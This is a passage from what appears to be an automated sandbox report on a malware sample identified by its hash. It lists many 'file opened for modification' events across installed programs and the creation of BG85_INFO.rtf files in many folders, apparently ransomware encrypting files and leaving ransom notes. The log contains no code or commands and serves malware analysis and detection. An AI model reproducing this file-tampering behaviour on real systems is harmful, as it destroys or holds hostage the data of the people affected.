Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Caracas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\RepairExport.pptx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\HideExpand.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 